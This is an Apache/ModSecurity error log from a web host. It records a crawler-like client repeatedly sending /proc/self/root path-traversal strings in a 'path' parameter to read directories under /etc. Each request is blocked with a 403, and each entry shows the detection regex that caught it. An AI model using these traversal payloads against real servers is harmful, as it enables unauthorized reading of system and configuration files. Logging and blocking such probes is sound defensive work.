[Wed Mar 18 09:35:05.375543 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:52518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb-SmAPhZkrhU8w4lguAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:07.024141 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:52534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqb-8df6f5d65gmYZTIFAAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:12.516820 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:52550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcAMdf6f5d65gmYZTIGQAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:14.016294 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:36636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcAta6ubjKNq_cu4aMhQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:15.406225 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:36644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcA-w_le52K8_3pV3TPgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:18.958681 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:36654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcBvu8EFLIOrSqIpv4bQAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:20.249136 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:58918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcCNY0UrI5A3LftIyX5AAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:21.491550 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:58930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcCeyqAr6etmhZHNqyzQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:26.196362 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:42878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcDvu8EFLIOrSqIpv4cgAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:30.015278 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:58946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcEuw_le52K8_3pV3TRAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:31.135473 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:59990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcE-yqAr6etmhZHNqy2AAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:33.873602 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:51692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcFeyqAr6etmhZHNqy2wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:35:36.271219 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:51706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcGOw_le52K8_3pV3TTQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:37.771484 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:51712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcGSmAPhZkrhU8w4lg1AAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:35:40.091821 2026] [mime_magic:error] [pid 29882:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:58660] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:35:40.309929 2026] [mime_magic:error] [pid 17653:tid 140411649607424] (70014)End of file found: [client 57.141.18.30:58676] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:35:45.751018 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:51726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcIUzinOy1jxa1j4cIDwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:35:47.105937 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:51024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcI-w_le52K8_3pV3TVwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:35:48.380658 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:51026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcJOyqAr6etmhZHNqy7AAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:36:04.863025 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:55384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcNOw_le52K8_3pV3TYgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:36:18.195575 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:55400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcQuyqAr6etmhZHNqzBQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:36:19.523198 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:33418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcQ0zinOy1jxa1j4cIFwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:36:20.914147 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:33428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqcROoXxyEfFpUF8f9h6AAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
